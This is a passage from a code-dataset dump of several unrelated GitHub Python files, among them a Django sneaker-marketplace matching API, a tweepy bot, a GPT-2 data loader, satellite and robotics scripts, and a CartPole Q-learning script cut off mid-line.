config.n_tasks + 1)]\n \n return train_dataset_splits,val_loaders,task_output_space\n\n\n\ndef test_error(trainer,task_idx):\n trainer.model.eval()\n acc = 0\n acc_cnt = 0\n with torch.no_grad():\n for idx, data in enumerate(trainer.val_loaders[task_idx]):\n \n data, target, task = data\n \n data = data.to(trainer.config.device)\n target = target.to(trainer.config.device)\n \n outputs = trainer.forward(data,task)\n \n acc += accuracy(outputs, target)\n acc_cnt += float(target.shape[0])\n return acc/acc_cnt\n \n \ndef accuracy(outputs,target):\n topk=(1,) \n with torch.no_grad():\n maxk = max(topk)\n \n _, pred = outputs.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n \n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum().item()\n res.append(correct_k)\n \n if len(res)==1:\n return res[0]\n else:\n return res\n \n \n \ndef parameters_to_grad_vector(parameters):\n # Flag for the device where the parameter is located\n param_device = None\n vec = []\n for param in parameters:\n # Ensure the parameters are located in the same device\n param_device = _check_param_device(param, param_device)\n vec.append(param.grad.view(-1))\n \n return torch.cat(vec)\n\ndef count_parameter(model):\n return sum(p.numel() for p in model.parameters())\n\n\n\ndef grad_vector_to_parameters(vec, parameters):\n # Ensure vec of type Tensor\n if not isinstance(vec, torch.Tensor):\n raise TypeError('expected torch.Tensor, but got: {}'\n .format(torch.typename(vec)))\n # Flag for the device where the parameter is located\n param_device = None\n # Pointer for slicing the vector for each parameter\n pointer = 0\n for param in parameters:\n # Ensure the parameters are located in the same device\n param_device = _check_param_device(param, param_device)\n # The length of the parameter\n num_param = param.numel()\n # Slice the vector, reshape it, and replace the old data of the parameter\n # param.data = vec[pointer:pointer + num_param].view_as(param).data\n param.grad = vec[pointer:pointer + num_param].view_as(param).clone()\n # Increment the pointer\n pointer += num_param \n","repo_name":"tldoan/PCA-OGD","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7151,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"27"} +{"seq_id":"14935636503","text":"import sys\n\nmap = {\n ']': '[',\n '}': '{',\n ')': '(',\n '>': '<'\n}\ncost = {\n ')': 3,\n ']': 57,\n '}': 1197,\n '>': 25137\n}\nwith open(\"test.in\") as f:\n strings = f.read().splitlines()\n ans = 0\n for s in strings:\n stack = []\n for c in s:\n if c in map:\n if len(stack) == 0 or stack[-1] != map[c]:\n ans += cost[c]\n break\n stack.pop()\n else:\n stack.append(c)\n print(ans)\n","repo_name":"eldarbogdanov/advent-of-code-2021","sub_path":"python/d10p1.py","file_name":"d10p1.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"19530102811","text":"# Twitter api\nimport tweepy\nimport os\n\ndef main():\n # Auth vars\n consumer_key = os.getenv('twitter_consumer_key')\n consumer_secret = os.getenv('twitter_consumer_secret')\n bearer_token = os.getenv('twitter_bearer_token')\n access_token = os.getenv('twitter_access_token')\n access_token_secret = os.getenv('twitter_access_token_secret')\n\n # Authenticate\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = tweepy.API(auth)\n\n # Set text and image\n message = 'I wrote some simple code that posted this tweet. #python #tweepy'\n image = api.media_upload('image.jpg')\n\n # Post tweet with image\n api.update_status(status = message, media_ids=[image.media_id])\n\nif __name__ == \"__main__\":\n main()","repo_name":"sorenrood/twitterbot","sub_path":"tweetbot.py","file_name":"tweetbot.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"40041105222","text":"from __future__ import unicode_literals\nfrom django.shortcuts import render\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import viewsets, mixins, status\n#from django.conf import settings\n#from django.shortcuts import redirect\nfrom django.contrib.auth.hashers import make_password, check_password\n#from django.contrib.auth.decorators import login_required\n#from django.contrib.auth import authenticate, login, logout\n#from django.contrib.auth.models import User\nfrom skyjacs_app.models import Profile, Listing, Notification, Image, User\nfrom skyjacs_app.serializers import UserSerializer, SensitiveUserSerializer, ProfileSerializer, ListingSerializer, NotificationSerializer, ImageSerializer, MatchingSerializer\nfrom fuzzywuzzy import fuzz\nfrom fuzzywuzzy import process\nimport uuid\n\nSLIPON_REL = {\n\t'Slip On' : 5.0 ,\n\t'Low Top' : 4.0 ,\n\t'Skaters' : 4.0 ,\n\t'Cageless' : 3.0 ,\n\t'Runners/Joggers' : 3.0 ,\n\t'High Top' : 2.0 ,\n\t'Basketball' : 1.0,\n}\n\nLOWTOP_REL = {\n\t'Slip On' : 4.0 ,\n\t'Low Top' : 5.0 ,\n\t'Skaters' : 3.0 ,\n\t'Cageless' : 3.0 ,\n\t'Runners/Joggers' : 3.0 ,\n\t'High Top' : 1.0 ,\n\t'Basketball' : 3.0,\n}\n\nHIGHTOP_REL = {\n\t'Slip On' : 2.0 ,\n\t'Low Top' : 2.0 ,\n\t'Skaters' : 3.0 ,\n\t'Cageless' : 4.0 ,\n\t'Runners/Joggers' : 3.0 ,\n\t'High Top' : 5.0 ,\n\t'Basketball' : 4.0,\n}\n\nSKATERS_REL = {\n\t'Slip On' : 3.0 ,\n\t'Low Top' : 4.0 ,\n\t'Skaters' : 5.0 ,\n\t'Cageless' : 2.0 ,\n\t'Runners/Joggers' : 2.0 ,\n\t'High Top' : 3.0 ,\n\t'Basketball' : 2.0,\n}\n\nRUNNERSJOGGERS_REL = {\n\t'Slip On' : 2.0 ,\n\t'Low Top' : 4.0 ,\n\t'Skaters' : 3.0 ,\n\t'Cageless' : 4.0 ,\n\t'Runners/Joggers' : 5.0 ,\n\t'High Top' : 3.0 ,\n\t'Basketball' : 4.0,\n}\n\nBASKETBAL_REL = {\n\t'Slip On' : 1.0 ,\n\t'Low Top' : 3.0 ,\n\t'Skaters' : 2.0 ,\n\t'Cageless' : 4.0 ,\n\t'Runners/Joggers' : 4.0 ,\n\t'High Top' : 3.0 ,\n\t'Basketball' : 5.0,\n}\n\nCAGELESS_REL = {\n\t'Slip On' : 3.0 ,\n\t'Low Top' : 3.0 ,\n\t'Skaters' : 1.0 ,\n\t'Cageless' : 5.0 ,\n\t'Runners/Joggers' : 3.0 ,\n\t'High Top' : 4.0 ,\n\t'Basketball' : 4.0,\n}\n\nTYPEOPTS = {\n\t'Slip On' : SLIPON_REL ,\n\t'Low Top' : LOWTOP_REL ,\n\t'Skaters' : SKATERS_REL ,\n\t'Cageless' : CAGELESS_REL ,\n\t'Runners/Joggers' : RUNNERSJOGGERS_REL ,\n\t'High Top' : HIGHTOP_REL ,\n\t'Basketball' : BASKETBAL_REL,\n}\n\nCONDITIONOPTS = {\n\t'Damaged' : 1.0,\n\t'Well-worn' : 2.0,\n\t'Good Condition' : 3.0,\n\t'New/Little use' : 4.0,\n\t'Boxed Mint' : 5.0,\n}\n\ndef matchType(pkSpec, dbSpec, strictList):\n\n\tif pkSpec == '' :\n\t\treturn -1\n\n\tif dbSpec == '' :\n\t\tdbSpecRelValue = 5.0\n\telse :\n\t\tdbSpecRelValue = TYPEOPTS[pkSpec][dbSpec]\n\n\tif 'type' in strictList:\n\t\tif ((dbSpecRelValue/5.0) * 100) != 100:\n\t\t\treturn -2\n\n\treturn (dbSpecRelValue/5.0) * 100\t\n\ndef matchSex(pkSpec, dbSpec, strictList):\n\n\tif pkSpec == '' or dbSpec == '':\n\t\treturn -1\n\n\tif 'sex' in strictList:\n\t\tif pkSpec != dbSpec:\n\t\t\treturn -2\n\n\tif pkSpec == dbSpec:\n\t\treturn 100\n\telif 'Unisex' in [pkSpec, dbSpec]:\n\t\treturn 50\n\telse:\n\t\treturn 0\n\ndef matchBrand(pkSpec, dbSpec, strictList):\n\n\tif pkSpec == '' or dbSpec == '':\n\t\treturn -1\n\n\tif 'brand' in strictList:\n\t\tif pkSpec != dbSpec:\n\t\t\treturn -2\n\n\tif pkSpec != dbSpec:\n\t\treturn 0\n\telse:\n\t\treturn 100\n\ndef matchModel(pkSpec, dbSpec, strictList):\n\n\tif pkSpec == '' or dbSpec == '':\n\t\treturn -1\n\n\tif 'model' in strictList:\n\t\tif fuzz.ratio(pkSpec, dbSpec) != 100:\n\t\t\treturn -2\n\n\treturn (fuzz.partial_ratio(pkSpec, dbSpec) + fuzz.token_sort_ratio(pkSpec, dbSpec) + fuzz.ratio(pkSpec, dbSpec))/3\n\ndef matchCondition(pkSpec, dbSpec, strictList):\n\n\tif pkSpec == '':\n\t\treturn -1\n\telse:\n\t\tpkSpecVal = CONDITIONOPTS[pkSpec]\n\n\t\t\n\tif dbSpec == '':\n\t\tdbSpecVal = 5.0\n\telse:\n\t\tdbSpecVal = CONDITIONOPTS[dbSpec]\n\n\tif 'condition' in strictList:\n\t\tif pkSpec != dbSpec:\n\t\t\treturn -2\n\n\tif pkSpecVal == dbSpecVal:\n\t\treturn 100\n\telif (pkSpecVal > dbSpecVal):\n\t\treturn 100.0 - ((pkSpecVal - dbSpecVal)/5.0 * 100.0)\n\telif (pkSpecVal < dbSpecVal):\n\t\treturn 100 - ((dbSpecVal - pkSpecVal)/5.0 * 100.0)\n\n\treturn 0\n\n\ndef matchMaterial(pkSpec, dbSpec, strictList):\n\n\tif pkSpec == '' or dbSpec == '':\n\t\treturn -1\n\n\tif 'material' in strictList:\n\t\tif pkSpec != dbSpec:\n\t\t\treturn -2\n\n\tif pkSpec == dbSpec:\n\t\treturn 100\n\telse:\n\t\treturn 0\n\ndef matchColour(pkSpec, dbSpec, strictList):\n\n\tif pkSpec == '' or dbSpec == '':\n\t\treturn -1\n\n\tif 'colour' in strictList:\n\t\tif fuzz.token_sort_ratio(pkSpec, dbSpec) != 100:\n\t\t\treturn -2\n\n\treturn (fuzz.token_sort_ratio(pkSpec, dbSpec))\n\ndef matchSize(pkSpec, dbSpec, strictList):\n\n\tif pkSpec == 0.0 or dbSpec:\n\t\treturn -1\n\n\tif 'size' in strictList:\n\t\tif pkSpec != dbSpec:\n\t\t\treturn -2\n\n\tif pkSpec == dbSpec:\n\t\treturn 100\n\telif pkSpec > dbSpec:\n\t\tdiff = pkSpec - dbSpec\n\t\treturn 100.0 - (diff/13.5 * 100)\n\telif pkSpec < dbSpec:\n\t\tdiff = dbSpec - pkSpec\n\t\treturn 100.0 - (diff/13.5 * 100)\n\ndef getStrict(pkSpec):\n\n\tstrictList = []\n\n\tif pkSpec.type_strict == True:\n\t\tstrictList.append('type')\n\tif pkSpec.sex_strict == True:\n\t\tstrictList.append('sex')\n\tif pkSpec.brand_strict == True:\n\t\tstrictList.append('brand')\n\tif pkSpec.model_strict == True:\n\t\tstrictList.append('model')\n\tif pkSpec.colour_strict == True:\n\t\tstrictList.append('colour')\n\tif pkSpec.condition_strict == True:\n\t\tstrictList.append('condition')\n\tif pkSpec.material_strict == True:\n\t\tstrictList.append('material')\n\tif pkSpec.size_strict == True:\n\t\tstrictList.append('size')\n\n\treturn strictList\n\ndef getPriority(pkSpec):\n\n\tpriorityList = []\n\n\tif pkSpec.type_priority == True:\n\t\tpriorityList.append('type')\n\tif pkSpec.sex_priority == True:\n\t\tpriorityList.append('sex')\n\tif pkSpec.brand_priority == True:\n\t\tpriorityList.append('brand')\n\tif pkSpec.model_priority == True:\n\t\tpriorityList.append('model')\n\tif pkSpec.colour_priority == True:\n\t\tpriorityList.append('colour')\n\tif pkSpec.condition_priority == True:\n\t\tpriorityList.append('condition')\n\tif pkSpec.material_priority == True:\n\t\tpriorityList.append('material')\n\tif pkSpec.size_priority == True:\n\t\tpriorityList.append('size')\n\n\treturn priorityList\n\ndef prioritiseField(field):\n\n\treturn field * 1.5\n\ndef authenticate(username, token):\n\ttry:\n\t\tuser = User.objects.get(username=username, token=token)\n\t\treturn user\n\texcept User.DoesNotExist:\n\t\treturn None\n\nclass UserViewSet(\n\tmixins.RetrieveModelMixin, \n\tmixins.UpdateModelMixin, \n\tmixins.DestroyModelMixin, \n\tmixins.ListModelMixin, \n\tviewsets.GenericViewSet):\n\tqueryset = User.objects.all().order_by('uid')\n\tserializer_class = UserSerializer\n\nclass ProfileViewSet(viewsets.ModelViewSet):\n\tqueryset = Profile.objects.all().order_by('uid')\n\tserializer_class = ProfileSerializer\n\nclass NewUserView(APIView):\n\n\tdef post(self, request, format=None):\n\n\t\temail = request.POST.get('email')\n\t\tusername = request.POST.get('username')\n\t\tfirst_name = request.POST.get('first_name')\n\t\tlast_name = request.POST.get('last_name')\n\t\tpassword = make_password(request.POST.get('password'), salt=None, hasher='default')\n\n\t\tnewUser = User.objects.create(\n\t\t\temail=email, \n\t\t\tusername=username,\n\t\t\tpassword=password)\n\n\t\tnewUserProfile = Profile.objects.create(\n\t\t\tuser=newUser,\n\t\t\tfirst_name=first_name,\n\t\t\tlast_name=last_name)\n\n\t\tqueryset = newUser\n\t\tserializer = SensitiveUserSerializer(queryset)\n\n\t\treturn Response(serializer.data)\n\nclass LoginView(APIView):\n\n\tdef post(self, request, format=None):\n\n\t\tusername = request.POST.get('username')\n\t\tpassword = request.POST.get('password')\n\n\t\ttry:\n\t\t\tuser = User.objects.get(username=username)\n\t\t\tif check_password(password, user.password):\n\t\t\t\ttoken = uuid.uuid4().hex\n\t\t\t\tuser.token = token\n\t\t\t\tuser.save()\n\n\t\t\t\treturn Response(token)\n\t\texcept User.DoesNotExist:\n\t\t\treturn Response(\"Failed to login. Username or Password is incorrect.\", status=status.HTTP_400_BAD_REQUEST)\n\nclass LogoutView(APIView):\n\n\tdef post(self, request, format=None):\n\t\tusername = request.POST.get('username')\n\t\ttoken = request.POST.get('token')\n\n\t\tuser = authenticate(username, token)\n\t\tif user != None:\n\t\t\tuser.token = None\n\t\t\tuser.save()\n\t\t\treturn Response(\"You've been successfully logged out.\")\n\t\telse:\n\t\t\treturn Response(\"REDIRECT SOMEWHERE\")\n\nclass ListingViewSet(viewsets.ModelViewSet):\n\tqueryset = Listing.objects.all().order_by('uid')\t\n\tserializer_class = ListingSerializer\n\nclass NotificationViewSet(viewsets.ModelViewSet):\n\tqueryset = Notification.objects.all().order_by('uid')\n\tserializer_class = NotificationSerializer\n\nclass ImageViewSet(viewsets.ModelViewSet):\n\tqueryset = Image.objects.all().order_by('uid')\n\tserializer_class = ImageSerializer\n\nclass MatchingView(APIView):\n\n\tdef get(self, request, pk, format=None):\n\t\n\t\tpkSpec = Listing.objects.get(pk=pk)\n\t\tdbSpecs = Listing.objects.all().exclude(listing_type=pkSpec.listing_type)\n\n\t\tstrictList = []\n\t\tpriorityList = []\n\n\t\tif pkSpec.listing_type == \"Buying\":\n\n\t\t\tstrictList = getStrict(pkSpec)\n\t\t\tpriorityList = getPriority(pkSpec)\n\n\t\tfor dbSpec in dbSpecs:\n\t\t\tif dbSpec.uid != pkSpec.uid:\n\t\t\t\tif dbSpec.listing_type != pkSpec.listing_type:\n\t\t\t\t\tvalidFields = 8\n\t\t\t\t\ttypePc = matchType(pkSpec.item_type, dbSpec.item_type, strictList)\n\t\t\t\t\tsexPc = matchSex(pkSpec.item_sex, dbSpec.item_sex, strictList)\n\t\t\t\t\tbrandPc = matchBrand(pkSpec.item_brand, dbSpec.item_brand, strictList)\n\t\t\t\t\tmodelPc = 0\n\t\t\t\t\tif brandPc == 100 or brandPc == -1:\n\t\t\t\t\t\tmodelPc = matchModel(pkSpec.item_model, dbSpec.item_model, strictList)\n\t\t\t\t\tcolourPc = matchColour(pkSpec.item_colour, dbSpec.item_colour, strictList)\n\t\t\t\t\tconditionPc = matchCondition(pkSpec.item_condition, dbSpec.item_condition, strictList)\n\t\t\t\t\tmaterialPc = matchMaterial(pkSpec.item_material, dbSpec.item_material, strictList)\n\t\t\t\t\tsizePc = matchSize(pkSpec.item_size, dbSpec.item_size, strictList)\n\t\t\t\t\tvalueList = [typePc, sexPc, brandPc, modelPc, colourPc, conditionPc, materialPc, sizePc]\n\t\t\t\t\tprint(valueList)\n\t\t\t\t\ttotalPc = 0\n\t\t\t\t\tif priorityList != []:\n\t\t\t\t\t\tfor priority in priorityList:\n\t\t\t\t\t\t\tif priority == 'type' and typePc != -1:\n\t\t\t\t\t\t\t\ttypePc = prioritiseField(typePc)\n\t\t\t\t\t\t\telif priority == 'sex' and sexPc != -1:\n\t\t\t\t\t\t\t\tsexPc = prioritiseField(sexPc)\n\t\t\t\t\t\t\telif priority == 'brand' and brandPc != -1:\n\t\t\t\t\t\t\t\tbrandPc = prioritiseField(brandPc)\n\t\t\t\t\t\t\telif priority == 'model' and modelPc != -1:\n\t\t\t\t\t\t\t\tmodelPc = prioritiseField(modelPc)\n\t\t\t\t\t\t\telif priority == 'colour' and colourPc != -1:\n\t\t\t\t\t\t\t\tcolourPc = prioritiseField(colourPc)\n\t\t\t\t\t\t\telif priority == 'condition' and conditionPc != -1:\n\t\t\t\t\t\t\t\tconditionPc = prioritiseField(conditionPc)\n\t\t\t\t\t\t\telif priority == 'material' and materialPc != -1:\n\t\t\t\t\t\t\t\tmaterialPc = prioritiseField(materialPc)\n\t\t\t\t\t\t\telif priority == 'size' and sizePc != -1:\n\t\t\t\t\t\t\t\tsizePc = prioritiseField(sizePc)\n\n\t\t\t\t\tfor value in valueList:\n\t\t\t\t\t\tif value == -2:\n\t\t\t\t\t\t\tdbSpec.item_matching = None\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\tif value != -1:\n\t\t\t\t\t\t\ttotalPc = totalPc + value\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tvalidFields = validFields - 1\n\t\t\t\t\t#totalPc = (typePc + sexPc + brandPc + modelPc + \n\t\t\t\t\t#colourPc + conditionPc + materialPc + sizePc)/validFields\n\t\t\t\t\tif dbSpec.item_matching != -2:\n\t\t\t\t\t\tif validFields == 0 :\n\t\t\t\t\t\t\tdbSpec.item_matching = 100.0\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tdbSpec.item_matching = totalPc/validFields\n\n\t\t\t\t\t\tif dbSpec.item_matching > 100.0:\n\t\t\t\t\t\t\tdbSpec.item_matching = 100.0\n\n\t\tqueryset = dbSpecs\n\t\tserializer_class = MatchingSerializer(dbSpecs, many=True)\t\n\t\treturn Response(serializer.data)","repo_name":"s3542733/skyjacs_public","sub_path":"django-server/skyjacs_server/skyjacs_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"74196709192","text":"import json\nimport random\nimport torch\nimport numpy as np\nimport progressbar\nfrom torch.nn.utils import rnn\n\nclass Data:\n def __init__(self, model_name, train_path, dev_path, test_path, max_len, \n sos_token, pad_token, add_eos_token_to_data):\n '''\n model_name: gpt2\n train_path: training data path\n dev_path: validation data path\n test_path: test data path \n max_len: maximum length for training sequences \n sos_token: initialized sos token <-start_of_text->\n pad_token: used to pad the sequences <-pad->\n add_eos_token_to_data: whether we want to the model learn to generate eos token;\n if so, the model could automatically stop generation by generating eos token\n '''\n from transformers import GPT2TokenizerFast\n self.tokenizer = GPT2TokenizerFast.from_pretrained(model_name)\n self.sos_token, self.sos_token_id = self.add_special_token(sos_token)\n print ('sos token is {}, sos token id is {}'.format(self.sos_token, self.sos_token_id))\n self.pad_token, self.pad_token_id = self.add_special_token(pad_token)\n print ('pad token is {}, pad token id is {}'.format(self.pad_token, self.pad_token_id))\n self.eos_token, self.eos_token_id = self.tokenizer.bos_token, self.tokenizer.bos_token_id\n print ('eos token is {}, eos token id is {}'.format(self.eos_token, self.eos_token_id))\n self.add_eos_token_to_data = add_eos_token_to_data\n\n self.max_len = max_len\n self.train_token_list, self.train_token_id_list = self.process_one_file(train_path)\n self.dev_token_list, self.dev_token_id_list = self.process_one_file(dev_path)\n self.test_token_list, self.test_token_id_list = self.process_one_file(test_path)\n self.train_num, self.dev_num, self.test_num = len(self.train_token_list), len(self.dev_token_list), \\\n len(self.test_token_list)\n print ('train number:{}, dev number:{}, test number:{}'.format(self.train_num, self.dev_num, self.test_num))\n\n self.train_idx_list = [i for i in range(self.train_num)]\n random.shuffle(self.train_idx_list)\n self.dev_idx_list = [j for j in range(self.dev_num)]\n self.test_idx_list = [j for j in range(self.test_num)]\n self.dev_current_idx, self.test_current_idx = 0, 0\n\n def add_special_token(self, special_token):\n if special_token in self.tokenizer.vocab:\n print (special_token + ' token exists.')\n else:\n print ('Add token to the tokenizer.')\n print ('Original vocabulary size is {}'.format(len(self.tokenizer)))\n self.tokenizer.add_tokens([special_token])\n print ('Vocabulary size after extension is {}'.format(len(self.tokenizer)))\n assert len(self.tokenizer.convert_tokens_to_ids([special_token])) == 1\n special_token_id = self.tokenizer.convert_tokens_to_ids([special_token])[0]\n return special_token, special_token_id\n\n def process_one_file(self, path):\n print ('Processing {}'.format(path))\n with open(path) as f:\n item_list = json.load(f)\n lines = []\n for item in item_list:\n captions_list = item['captions']\n for one_caption in captions_list:\n lines.append(one_caption.strip())\n\n res_token_list, res_token_id_list = [], []\n n = len(lines)\n p = progressbar.ProgressBar(n)\n p.start()\n for i in range(n):\n p.update(i)\n text = lines[i].strip('\\n')\n self.process_one_text(text, res_token_list, res_token_id_list)\n p.finish()\n print ('{} processed!'.format(path))\n return res_token_list, res_token_id_list\n\n def process_one_text(self, text, res_token_list, res_token_id_list):\n tokens = self.tokenizer.tokenize(text, max_length=self.max_len, truncation=True)\n if len(tokens) <= 1: # filter out too short sequence\n return\n tokens = [self.sos_token] + tokens[:self.max_len]\n if self.add_eos_token_to_data:\n tokens = tokens + [self.eos_token]\n token_ids = self.tokenizer.convert_tokens_to_ids(tokens)\n res_token_list.append(tokens)\n res_token_id_list.append(token_ids)\n return\n\n def pad_batch(self, batch_id_list):\n batch_id_list = [torch.LongTensor(item) for item in batch_id_list]\n batch_tensor = rnn.pad_sequence(batch_id_list, batch_first=True, padding_value=self.pad_token_id)\n batch_mask = torch.ones_like(batch_tensor)\n batch_mask = batch_mask.masked_fill(batch_tensor.eq(self.pad_token_id), 0.0).type(torch.FloatTensor)\n return batch_tensor, batch_mask\n\n def process_output(self, batch_tgt_id_list):\n batch_tgt_id_list = [torch.LongTensor(item) for item in batch_tgt_id_list]\n batch_tgt_tensor, _ = self.pad_batch(batch_tgt_id_list) # padded target sequence\n batch_tgt_input_tensor = batch_tgt_tensor[:, :-1].clone()\n batch_tgt_output_tensor = batch_tgt_tensor[:, 1:].clone()\n return batch_tgt_input_tensor, batch_tgt_output_tensor\n\n def parse_batch(self, batch_id_list):\n batch_input, batch_labels = self.process_output(batch_id_list)\n batch_labels[batch_labels[:, :] == self.pad_token_id] = -100\n return batch_input, batch_labels\n\n def get_next_train_batch(self, batch_size):\n batch_idx_list = random.sample(self.train_idx_list, batch_size)\n batch_id_list, batch_token_list = [], []\n\n for idx in batch_idx_list:\n batch_id_list.append(self.train_token_id_list[idx])\n batch_token_list.append(self.train_token_list[idx])\n batch_input_tensor, batch_labels = self.parse_batch(batch_id_list)\n return batch_input_tensor, batch_labels, batch_token_list\n\n def get_next_validation_batch(self, batch_size, mode):\n batch_id_list, batch_token_list = [], []\n if mode == 'dev':\n curr_select_idx, instance_num = self.dev_current_idx, self.dev_num\n tgt_token_id_list, tgt_token_list = self.dev_token_id_list, self.dev_token_list\n elif mode == 'test':\n curr_select_idx, instance_num = self.test_current_idx, self.test_num\n tgt_token_id_list, tgt_token_list = self.test_token_id_list, self.test_token_list\n else:\n raise Exception('Wrong Validation Mode!!!')\n\n if curr_select_idx + batch_size < instance_num:\n for i in range(batch_size):\n curr_idx = curr_select_idx + i\n batch_id_list.append(tgt_token_id_list[curr_idx])\n batch_token_list.append(tgt_token_list[curr_idx])\n if mode == 'dev':\n self.dev_current_idx += batch_size\n else:\n self.test_current_idx += batch_size\n else:\n for i in range(batch_size):\n curr_idx = curr_select_idx + i\n if curr_idx > instance_num - 1: \n curr_idx = 0\n if mode == 'dev':\n self.dev_current_idx = 0\n else:\n self.test_current_idx = 0\n batch_id_list.append(tgt_token_id_list[curr_idx])\n batch_token_list.append(tgt_token_list[curr_idx])\n if mode == 'dev':\n self.dev_current_idx = 0\n else:\n self.test_current_idx = 0\n batch_input_tensor, batch_labels = self.parse_batch(batch_id_list)\n return batch_input_tensor, batch_labels, batch_token_list\n","repo_name":"yxuansu/MAGIC","sub_path":"image_captioning/language_model/dataclass.py","file_name":"dataclass.py","file_ext":"py","file_size_in_byte":7624,"program_lang":"python","lang":"en","doc_type":"code","stars":238,"dataset":"github-code","pt":"27"} +{"seq_id":"28978843379","text":"#!/usr/bin/env python\n\nimport rospy\nfrom simple_handeye_calibration import *\n\nrospy.init_node('handeye_server')\n\nmarker = rospy.get_param(\"~camera_marker\",\"ar_marker_0\")\ncamera_link = rospy.get_param(\"~camera_link\",\"camera_link\")\nbase_link = rospy.get_param(\"~base_link\",\"base_link\")\nee_marker = rospy.get_param(\"~ee_marker\",\"ee_marker\")\n\nsrv = SimpleHandeyeCalibration(\n marker=marker,\n camera_link=camera_link,\n ee_marker=ee_marker,\n base_link=base_link)\n\nsrv.spin(rospy.Rate(10))\n","repo_name":"cpaxton/costar_stack","sub_path":"costar_robot/simple_handeye_calibration/scripts/calibration_server.py","file_name":"calibration_server.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"27"} +{"seq_id":"23111208162","text":"import numpy as np\nimport pandas as pd\n\ndf = pd.DataFrame({'string': list('abc'),\n 'int64': list(range(1, 4)),\n 'uint8': np.arange(3, 6).astype('u1'),\n 'float64': np.arange(4.0, 7.0),\n 'bool1': [True, False, True],\n 'bool2': [False, True, False],\n 'dates': pd.date_range('now', periods=3).values,\n 'category': pd.Series(list(\"ABC\")).astype('category')})\ndf['tdeltas'] = df.dates.diff()\ndf['uint64'] = np.arange(3, 6).astype('u8')\ndf['other_dates'] = pd.date_range('20130101', periods=3).values\ndf['tz_aware_dates'] = pd.date_range('20130101', periods=3, tz='US/Eastern')\nprint(df)\nprint(df.dtypes)\n\n# select_dtypes()\nprint(df.select_dtypes(include=[bool]))\nprint(df.select_dtypes(include=['bool']))\nprint(df.select_dtypes(include=['number', 'bool'], exclude=['unsignedinteger']))\nprint(df.select_dtypes(include=['object']))\n\n\n# 打印子类型\ndef subdtypes(dtype):\n subs = dtype.__subclasses__()\n if not subs:\n return dtype\n return [dtype, [subdtypes(dt) for dt in subs]]\n\n\nprint(subdtypes(np.generic))\n","repo_name":"sunjiaxin111/pandas_learn","sub_path":"Pandas基本功能/根据dtype选择列.py","file_name":"根据dtype选择列.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"32699651480","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nfrom comtypes.client import *\nfrom comtypes.gen import STKObjects\n\nfrom misc.Scenario import Scenario\n\nclass DataProvider:\n \n def __init__(self, stkRoot, scenario) -> None:\n self.root = stkRoot\n self.sc = scenario\n self.sc2 = Scenario.getScenarioI(self.sc)\n\n\n # 获取dataprovider中的time speed radial in-track信息,并将输出存入result中\n # !注意想要获取参数名称的大小写不要输错,不然会报错\n def getResult(self, sat: STKObjects, elems = [\"Time\", \"speed\", \"radial\", \"in-track\"]) -> dict:\n \n # 获取笛卡尔速度,dataprovider中有一些我们想要获取的属性,不同provider中包含的属性不同\n cartV = sat.Dataproviders.Item(\"Cartesian Velocity\")\n cartVI = cartV.QueryInterface(STKObjects.IAgDataProviderGroup)\n\n # 获取Cartesian Velocity下ICRF文件夹中的数据,icrf是一种坐标系,其内可获得的属性有xyz、time、speed等\n cartVicrf = cartVI.Group.Item(\"ICRF\")\n cartVicrfI = cartVicrf.QueryInterface(STKObjects.IAgDataPrvTimeVar)\n\n # 设置timestep为60,并获取数据\n # rawResult type: STKObjects.IAgDrResult\n rawResult = cartVicrfI.ExecElements(self.sc2.StartTime, self.sc2.StopTime, 60, elems)\n \n # 从result中获取数据\n result = {}\n for i in range(len(elems)):\n result[elems[i]] = rawResult.DataSets.Item(i).GetValues()\n return result\n \n \n def showResult(self, result):\n # 使用pandas展示前五条数据信息\n dataframe = pd.DataFrame(result)\n print(dataframe.head(5))\n \n \n def drawResult(self, result, var):\n # 绘制速度随时间变化的图像\n plt.plot(result[var])\n plt.xlabel(\"Time [mins]\")\n plt.ylabel(\"Speed [km/sec]\")\n plt.title(\"Speed vs Time\")\n plt.show()\n\n\n\n","repo_name":"CrispOvO/stk_sample","sub_path":"analysis/dataprovider.py","file_name":"dataprovider.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"14671868474","text":"import gymnasium as gym\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom QLearning import QLearning\n\nenv = gym.make('CartPole-v1')\n(state, _) = env.reset()\n\nupper_bounds = env.observation_space.high\nlower_bounds = env.observation_space.low\ncart_vel_min = -3\ncart_vel_max = 3\npole_angle_vel_min = -10\npole_angle_vel_max = 10\nupper_bounds[1] = cart_vel_max\nlower_bounds[1] = cart_vel_min\nupper_bounds[3] = pole_angle_vel_max\nlower_bounds[3] = pole_angle_vel_min\n\nbin_size = 30\n\nalpha = 0.1\ngamma = 1\nepsilon = 0.2\nnumber_of_episodes = 15000\n\nQ1 = QLearning(env, alpha, gamma, epsilon, number_of_episodes, bin_size, lower_bounds, upper_bounds)\n\nQ1.train()\n\n(obtained_rewards_optimal, env1) = Q1.simulate_learned_strategy()\n\nplt.figure(figsize= (12, 5))\nplt.plot(Q1.sum_rewards_episode, color = 'blue', linewidth = 